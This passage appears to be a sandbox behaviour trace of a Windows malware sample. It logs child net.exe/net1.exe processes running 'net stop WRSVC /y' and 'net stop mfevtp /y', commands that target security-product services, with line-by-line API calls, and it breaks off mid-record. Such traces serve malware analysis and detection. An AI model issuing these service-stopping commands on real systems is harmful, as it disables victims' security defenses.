os_parent_pid = "0x908" cmd_line = "net stop WRSVC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 515 os_tid = 0x358 Process: id = "343" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x2562d000" os_pid = "0x7a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "342" os_parent_pid = "0x7d4" cmd_line = "C:\\Windows\\system32\\net1 stop WRSVC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 516 os_tid = 0x46c [0215.509] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f9b0 | out: lpSystemTimeAsFileTime=0x12f9b0*(dwLowDateTime=0x49a49c60, dwHighDateTime=0x1d57a87)) [0215.509] GetCurrentProcessId () returned 0x7a0 [0215.509] GetCurrentThreadId () returned 0x46c [0215.510] GetTickCount () returned 0x116f6ed [0215.510] QueryPerformanceCounter (in: lpPerformanceCount=0x12f9a8 | out: lpPerformanceCount=0x12f9a8*=33579421406) returned 1 [0215.510] GetModuleHandleA (lpModuleName=0x0) returned 0xbb0000 [0215.510] __set_app_type (_Type=0x1) [0215.510] __p__fmode () returned 0x74eb31f4 [0215.510] __p__commode () returned 0x74eb31fc [0215.510] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xbbffe6) returned 0x0 [0215.510] __getmainargs (in: _Argc=0xbc9064, _Argv=0xbc906c, _Env=0xbc9068, _DoWildCard=0, _StartInfo=0xbc9024 | out: _Argc=0xbc9064, _Argv=0xbc906c, _Env=0xbc9068) returned 0 [0215.510] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0215.510] GetConsoleOutputCP () returned 0x1b5 [0215.510] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xbc9080 | out: lpCPInfo=0xbc9080) returned 1 [0215.511] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.514] sprintf_s (in: _DstBuf=0x12f968, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0215.514] setlocale (category=0, locale=".437") returned="English_United States.437" [0215.516] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0215.516] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0215.516] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop WRSVC /y" [0215.517] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12f734, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0215.517] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x5e) returned 0x463bf0 [0215.517] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0215.517] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x12f938 | out: Buffer=0x12f938*=0x461c50) returned 0x0 [0215.517] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x12f938 | out: Buffer=0x12f938*=0x461c68) returned 0x0 [0215.517] _fileno (_File=0x74eb2900) returned -2 [0215.517] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0215.517] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0215.517] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0215.517] _wcsicmp (_String1="config", _String2="stop") returned -16 [0215.517] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0215.517] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0215.517] _wcsicmp (_String1="file", _String2="stop") returned -13 [0215.517] _wcsicmp (_String1="files", _String2="stop") returned -13 [0215.517] _wcsicmp (_String1="group", _String2="stop") returned -12 [0215.517] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0215.517] _wcsicmp (_String1="help", _String2="stop") returned -11 [0215.517] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0215.518] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0215.518] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0215.518] _wcsicmp (_String1="session", _String2="stop") returned -15 [0215.518] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0215.518] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0215.518] _wcsicmp (_String1="share", _String2="stop") returned -12 [0215.518] _wcsicmp (_String1="start", _String2="stop") returned -14 [0215.518] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0215.518] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0215.518] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0215.518] _wcsicmp (_String1="accounts", _String2="WRSVC") returned -22 [0215.518] _wcsicmp (_String1="computer", _String2="WRSVC") returned -20 [0215.518] _wcsicmp (_String1="config", _String2="WRSVC") returned -20 [0215.518] _wcsicmp (_String1="continue", _String2="WRSVC") returned -20 [0215.518] _wcsicmp (_String1="cont", _String2="WRSVC") returned -20 [0215.518] _wcsicmp (_String1="file", _String2="WRSVC") returned -17 [0215.518] _wcsicmp (_String1="files", _String2="WRSVC") returned -17 [0215.518] _wcsicmp (_String1="group", _String2="WRSVC") returned -16 [0215.518] _wcsicmp (_String1="groups", _String2="WRSVC") returned -16 [0215.518] _wcsicmp (_String1="help", _String2="WRSVC") returned -15 [0215.518] _wcsicmp (_String1="helpmsg", _String2="WRSVC") returned -15 [0215.518] _wcsicmp (_String1="localgroup", _String2="WRSVC") returned -11 [0215.518] _wcsicmp (_String1="pause", _String2="WRSVC") returned -7 [0215.518] _wcsicmp (_String1="session", _String2="WRSVC") returned -4 [0215.518] _wcsicmp (_String1="sessions", _String2="WRSVC") returned -4 [0215.518] _wcsicmp (_String1="sess", _String2="WRSVC") returned -4 [0215.518] _wcsicmp (_String1="share", _String2="WRSVC") returned -4 [0215.518] _wcsicmp (_String1="start", _String2="WRSVC") returned -4 [0215.518] _wcsicmp (_String1="stats", _String2="WRSVC") returned -4 [0215.518] _wcsicmp (_String1="statistics", _String2="WRSVC") returned -4 [0215.518] _wcsicmp (_String1="stop", _String2="WRSVC") returned -4 [0215.518] _wcsicmp (_String1="time", _String2="WRSVC") returned -3 [0215.518] _wcsicmp (_String1="user", _String2="WRSVC") returned -2 [0215.518] _wcsicmp (_String1="users", _String2="WRSVC") returned -2 [0215.518] _wcsicmp (_String1="msg", _String2="WRSVC") returned -10 [0215.518] _wcsicmp (_String1="messenger", _String2="WRSVC") returned -10 [0215.518] _wcsicmp (_String1="receiver", _String2="WRSVC") returned -5 [0215.518] _wcsicmp (_String1="rcv", _String2="WRSVC") returned -5 [0215.519] _wcsicmp (_String1="netpopup", _String2="WRSVC") returned -9 [0215.519] _wcsicmp (_String1="redirector", _String2="WRSVC") returned -5 [0215.519] _wcsicmp (_String1="redir", _String2="WRSVC") returned -5 [0215.519] _wcsicmp (_String1="rdr", _String2="WRSVC") returned -5 [0215.519] _wcsicmp (_String1="workstation", _String2="WRSVC") returned -3 [0215.519] _wcsicmp (_String1="work", _String2="WRSVC") returned -3 [0215.519] _wcsicmp (_String1="wksta", _String2="WRSVC") returned -7 [0215.519] _wcsicmp (_String1="prdr", _String2="WRSVC") returned -7 [0215.519] _wcsicmp (_String1="devrdr", _String2="WRSVC") returned -19 [0215.519] _wcsicmp (_String1="lanmanworkstation", _String2="WRSVC") returned -11 [0215.519] _wcsicmp (_String1="server", _String2="WRSVC") returned -4 [0215.519] _wcsicmp (_String1="svr", _String2="WRSVC") returned -4 [0215.519] _wcsicmp (_String1="srv", _String2="WRSVC") returned -4 [0215.519] _wcsicmp (_String1="lanmanserver", _String2="WRSVC") returned -11 [0215.519] _wcsicmp (_String1="alerter", _String2="WRSVC") returned -22 [0215.519] _wcsicmp (_String1="netlogon", _String2="WRSVC") returned -9 [0215.519] _wcsupr (in: _String="WRSVC" | out: _String="WRSVC") returned="WRSVC" [0215.519] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4654a0 [0215.522] GetServiceKeyNameW (in: hSCManager=0x4654a0, lpDisplayName="WRSVC", lpServiceName=0xbcaaf0, lpcchBuffer=0x12f8d4 | out: lpServiceName="", lpcchBuffer=0x12f8d4) returned 0 [0215.522] _wcsicmp (_String1="msg", _String2="WRSVC") returned -10 [0215.522] _wcsicmp (_String1="messenger", _String2="WRSVC") returned -10 [0215.522] _wcsicmp (_String1="receiver", _String2="WRSVC") returned -5 [0215.522] _wcsicmp (_String1="rcv", _String2="WRSVC") returned -5 [0215.522] _wcsicmp (_String1="redirector", _String2="WRSVC") returned -5 [0215.522] _wcsicmp (_String1="redir", _String2="WRSVC") returned -5 [0215.522] _wcsicmp (_String1="rdr", _String2="WRSVC") returned -5 [0215.522] _wcsicmp (_String1="workstation", _String2="WRSVC") returned -3 [0215.522] _wcsicmp (_String1="work", _String2="WRSVC") returned -3 [0215.523] _wcsicmp (_String1="wksta", _String2="WRSVC") returned -7 [0215.523] _wcsicmp (_String1="prdr", _String2="WRSVC") returned -7 [0215.523] _wcsicmp (_String1="devrdr", _String2="WRSVC") returned -19 [0215.523] _wcsicmp (_String1="lanmanworkstation", _String2="WRSVC") returned -11 [0215.523] _wcsicmp (_String1="server", _String2="WRSVC") returned -4 [0215.523] _wcsicmp (_String1="svr", _String2="WRSVC") returned -4 [0215.523] _wcsicmp (_String1="srv", _String2="WRSVC") returned -4 [0215.523] _wcsicmp (_String1="lanmanserver", _String2="WRSVC") returned -11 [0215.523] _wcsicmp (_String1="alerter", _String2="WRSVC") returned -22 [0215.523] _wcsicmp (_String1="netlogon", _String2="WRSVC") returned -9 [0215.523] NetServiceControl (in: servername=0x0, service="WRSVC", opcode=0x0, arg=0x0, bufptr=0x12f8d0 | out: bufptr=0x12f8d0) returned 0x889 [0215.524] wcscpy_s (in: _Destination=0xbca4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0215.524] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0215.525] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xbcb338, nSize=0x800, Arguments=0xbc9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0215.526] GetFileType (hFile=0x26c) returned 0x3 [0215.526] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x463fd0 [0215.526] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x463fd0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0215.526] WriteFile (in: hFile=0x26c, lpBuffer=0x463fd0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x12f810, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12f810, lpOverlapped=0x0) returned 0 [0215.526] LocalFree (hMem=0x463fd0) returned 0x0 [0215.526] GetFileType (hFile=0x26c) returned 0x3 [0215.526] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x466278 [0215.526] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x466278, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nF", lpUsedDefaultChar=0x0) returned 2 [0215.526] WriteFile (in: hFile=0x26c, lpBuffer=0x466278, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x12f810, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12f810, lpOverlapped=0x0) returned 0 [0215.526] LocalFree (hMem=0x466278) returned 0x0 [0215.526] _ultow (in: _Dest=0x889, _Radix=1243200 | out: _Dest=0x889) returned="2185" [0215.526] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xbcb338, nSize=0x800, Arguments=0xbc9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0215.526] GetFileType (hFile=0x26c) returned 0x3 [0215.526] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x466278 [0215.526] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x466278, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0215.526] WriteFile (in: hFile=0x26c, lpBuffer=0x466278, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x12f81c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12f81c, lpOverlapped=0x0) returned 0 [0215.526] LocalFree (hMem=0x466278) returned 0x0 [0215.526] GetFileType (hFile=0x26c) returned 0x3 [0215.526] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x466278 [0215.526] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x466278, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nF", lpUsedDefaultChar=0x0) returned 2 [0215.527] WriteFile (in: hFile=0x26c, lpBuffer=0x466278, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x12f81c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12f81c, lpOverlapped=0x0) returned 0 [0215.527] LocalFree (hMem=0x466278) returned 0x0 [0215.527] NetApiBufferFree (Buffer=0x461c50) returned 0x0 [0215.527] NetApiBufferFree (Buffer=0x461c68) returned 0x0 [0215.527] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop WRSVC /y" [0215.527] exit (_Code=2) Process: id = "344" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5c820000" os_pid = "0xaf4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop mfevtp /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 517 os_tid = 0x640 Process: id = "345" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x65398000" os_pid = "0x2ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "344" os_parent_pid = "0xaf4" cmd_line = "C:\\Windows\\system32\\net1 stop mfevtp /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 518 os_tid = 0x7ac [0215.661] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1bfe0c | out: lpSystemTimeAsFileTime=0x1bfe0c*(dwLowDateTime=0x49bc6a20, dwHighDateTime=0x1d57a87)) [0215.661] GetCurrentProcessId () returned 0x2ac [0215.661] GetCurrentThreadId () returned 0x7ac [0215.661] GetTickCount () returned 0x116f789 [0215.661] QueryPerformanceCounter (in: lpPerformanceCount=0x1bfe04 | out: lpPerformanceCount=0x1bfe04*=33594579452) returned 1 [0215.661] GetModuleHandleA (lpModuleName=0x0) returned 0xe30000 [0215.661] __set_app_type (_Type=0x1) [0215.661] __p__fmode () returned 0x74eb31f4 [0215.662] __p__commode () returned 0x74eb31fc [0215.662] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe3ffe6) returned 0x0 [0215.662] __getmainargs (in: _Argc=0xe49064, _Argv=0xe4906c, _Env=0xe49068, _DoWildCard=0, _StartInfo=0xe49024 | out: _Argc=0xe49064, _Argv=0xe4906c, _Env=0xe49068) returned 0 [0215.662] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0215.662] GetConsoleOutputCP () returned 0x1b5 [0215.662] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe49080 | out: lpCPInfo=0xe49080) returned 1 [0215.662] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.665] sprintf_s (in: _DstBuf=0x1bfdc4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0215.665] setlocale (category=0, locale=".437") returned="English_United States.437" [0215.667] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0215.667] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0215.667] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop mfevtp /y" [0215.667] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1bfb90, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0215.667] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x60) returned 0x253c00 [0215.668] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0215.668] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1bfd94 | out: Buffer=0x1bfd94*=0x251c60) returned 0x0 [0215.668] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1bfd94 | out: Buffer=0x1bfd94*=0x251c78) returned 0x0 [0215.668] _fileno (_File=0x74eb2900) returned -2 [0215.668] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0215.668] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0215.668] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0215.668] _wcsicmp (_String1="config", _String2="stop") returned -16 [0215.668] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0215.668] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0215.668] _wcsicmp (_String1="file", _String2="stop") returned -13 [0215.668] _wcsicmp (_String1="files", _String2="stop") returned -13 [0215.668] _wcsicmp (_String1="group", _String2="stop") returned -12 [0215.668] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0215.668] _wcsicmp (_String1="help", _String2="stop") returned -11 [0215.668] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0215.668] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0215.668] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0215.668] _wcsicmp (_String1="session", _String2="stop") returned -15 [0215.669] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0215.669] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0215.669] _wcsicmp (_String1="share", _String2="stop") returned -12 [0215.669] _wcsicmp (_String1="start", _String2="stop") returned -14 [0215.669] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0215.669] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0215.669] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0215.669] _wcsicmp (_String1="accounts", _String2="mfevtp") returned -12 [0215.669] _wcsicmp (_String1="computer", _String2="mfevtp") returned -10 [0215.669] _wcsicmp (_String1="config", _String2="mfevtp") returned -10 [0215.669] _wcsicmp (_String1="continue", _String2="mfevtp") returned -10 [0215.669] _wcsicmp (_String1="cont", _String2="mfevtp") returned -10 [0215.669] _wcsicmp (_String1="file", _String2="mfevtp") returned -7 [0215.669] _wcsicmp (_String1="files", _String2="mfevtp") returned -7 [0215.669] _wcsicmp (_String1="group", _String2="mfevtp") returned -6 [0215.669] _wcsicmp (_String1="groups", _String2="mfevtp") returned -6 [0215.669] _wcsicmp (_String1="help", _String2="mfevtp") returned -5 [0215.669] _wcsicmp (_String1="helpmsg", _String2="mfevtp") returned -5 [0215.669] _wcsicmp (_String1="localgroup", _String2="mfevtp") returned -1 [0215.669] _wcsicmp (_String1="pause", _String2="mfevtp") returned 3 [0215.669] _wcsicmp (_String1="session", _String2="mfevtp") returned 6 [0215.669] _wcsicmp (_String1="sessions", _String2="mfevtp") returned 6 [0215.669] _wcsicmp (_String1="sess", _String2="mfevtp") returned 6 [0215.669] _wcsicmp (_String1="share", _String2="mfevtp") returned 6 [0215.669] _wcsicmp (_String1="start", _String2="mfevtp") returned 6 [0215.669] _wcsicmp (_String1="stats", _String2="mfevtp") returned 6 [0215.669] _wcsicmp (_String1="statistics", _String2="mfevtp") returned 6 [0215.669] _wcsicmp (_String1="stop", _String2="mfevtp") returned 6 [0215.669] _wcsicmp (_String1="time", _String2="mfevtp") returned 7 [0215.669] _wcsicmp (_String1="user", _String2="mfevtp") returned 8 [0215.669] _wcsicmp (_String1="users", _String2="mfevtp") returned 8 [0215.669] _wcsicmp (_String1="msg", _String2="mfevtp") returned 13 [0215.669] _wcsicmp (_String1="messenger", _String2="mfevtp") returned -1 [0215.669] _wcsicmp (_String1="receiver", _String2="mfevtp") returned 5 [0215.669] _wcsicmp (_String1="rcv", _String2="mfevtp") returned 5 [0215.669] _wcsicmp (_String1="netpopup", _String2="mfevtp") returned 1 [0215.669] _wcsicmp (_String1="redirector", _String2="mfevtp") returned 5 [0215.670] _wcsicmp (_String1="redir", _String2="mfevtp") returned 5 [0215.670] _wcsicmp (_String1="rdr", _String2="mfevtp") returned 5 [0215.670] _wcsicmp (_String1="workstation", _String2="mfevtp") returned 10 [0215.670] _wcsicmp (_String1="work", _String2="mfevtp") returned 10 [0215.670] _wcsicmp (_String1="wksta", _String2="mfevtp") returned 10 [0215.670] _wcsicmp (_String1="prdr", _String2="mfevtp") returned 3 [0215.670] _wcsicmp (_String1="devrdr", _String2="mfevtp") returned -9 [0215.670] _wcsicmp (_String1="lanmanworkstation", _String2="mfevtp") returned -1 [0215.670] _wcsicmp (_String1="server", _String2="mfevtp") returned 6 [0215.670] _wcsicmp (_String1="svr", _String2="mfevtp") returned 6 [0215.670] _wcsicmp (_String1="srv", _String2="mfevtp") returned 6 [0215.670] _wcsicmp (_String1="lanmanserver", _String2="mfevtp") returned -1 [0215.670] _wcsicmp (_String1="alerter", _String2="mfevtp") returned -12 [0215.670] _wcsicmp (_String1="netlogon", _String2="mfevtp") returned 1 [0215.670] _wcsupr (in: _String="mfevtp" | out: _String="MFEVTP") returned="MFEVTP" [0215.670] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2554b0 [0215.673] GetServiceKeyNameW (in: hSCManager=0x2554b0, lpDisplayName="MFEVTP", lpServiceName=0xe4aaf0, lpcchBuffer=0x1bfd30 | out: lpServiceName="", lpcchBuffer=0x1bfd30) returned 0 [0215.674] _wcsicmp (_String1="msg", _String2="MFEVTP") returned 13 [0215.674] _wcsicmp (_String1="messenger", _String2="MFEVTP") returned -1 [0215.674] _wcsicmp (_String1="receiver", _String2="MFEVTP") returned 5 [0215.674] _wcsicmp (_String1="rcv", _String2="MFEVTP") returned 5 [0215.674] _wcsicmp (_String1="redirector", _String2="MFEVTP") returned 5 [0215.674] _wcsicmp (_String1="redir", _String2="MFEVTP") returned 5 [0215.674] _wcsicmp (_String1="rdr", _String2="MFEVTP") returned 5 [0215.674] _wcsicmp (_String1="workstation", _String2="MFEVTP") returned 10 [0215.674] _wcsicmp (_String1="work", _String2="MFEVTP") returned 10 [0215.674] _wcsicmp (_String1="wksta", _String2="MFEVTP") returned 10 [0215.674] _wcsicmp (_String1="prdr", _String2="MFEVTP") returned 3 [0215.674] _wcsicmp (_String1="devrdr", _String2="MFEVTP") returned -9 [0215.674] _wcsicmp (_String1="lanmanworkstation", _String2="MFEVTP") returned -1 [0215.674] _wcsicmp (_String1="server", _String2="MFEVTP") returned 6 [0215.674] _wcsicmp (_String1="svr", _String2="MFEVTP") returned 6 [0215.674] _wcsicmp (_String1="srv", _String2="MFEVTP") returned 6 [0215.674] _wcsicmp (_String1="lanmanserver", _String2="MFEVTP") returned -1 [0215.674] _wcsicmp (_String1="alerter", _String2="MFEVTP") returned -12 [0215.674] _wcsicmp (_String1="netlogon", _String2="MFEVTP") returned 1 [0215.674] NetServiceControl (in: servername=0x0, service="MFEVTP", opcode=0x0, arg=0x0, bufptr=0x1bfd2c | out: bufptr=0x1bfd2c) returned 0x889 [0215.675] wcscpy_s (in: _Destination=0xe4a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0215.675] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0215.676] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe4b338, nSize=0x800, Arguments=0xe49dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0215.677] GetFileType (hFile=0x26c) returned 0x3 [0215.677] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x253fe0 [0215.677] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x253fe0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0215.677] WriteFile (in: hFile=0x26c, lpBuffer=0x253fe0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1bfc6c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1bfc6c, lpOverlapped=0x0) returned 0 [0215.677] LocalFree (hMem=0x253fe0) returned 0x0 [0215.677] GetFileType (hFile=0x26c) returned 0x3 [0215.677] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x256288 [0215.677] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x256288, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n%", lpUsedDefaultChar=0x0) returned 2 [0215.677] WriteFile (in: hFile=0x26c, lpBuffer=0x256288, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1bfc6c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1bfc6c, lpOverlapped=0x0) returned 0 [0215.677] LocalFree (hMem=0x256288) returned 0x0 [0215.677] _ultow (in: _Dest=0x889, _Radix=1834140 | out: _Dest=0x889) returned="2185" [0215.677] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe4b338, nSize=0x800, Arguments=0xe49dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0215.677] GetFileType (hFile=0x26c) returned 0x3 [0215.678] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x256288 [0215.678] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x256288, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0215.678] WriteFile (in: hFile=0x26c, lpBuffer=0x256288, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1bfc78, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1bfc78, lpOverlapped=0x0) returned 0 [0215.678] LocalFree (hMem=0x256288) returned 0x0 [0215.678] GetFileType (hFile=0x26c) returned 0x3 [0215.678] LocalAlloc 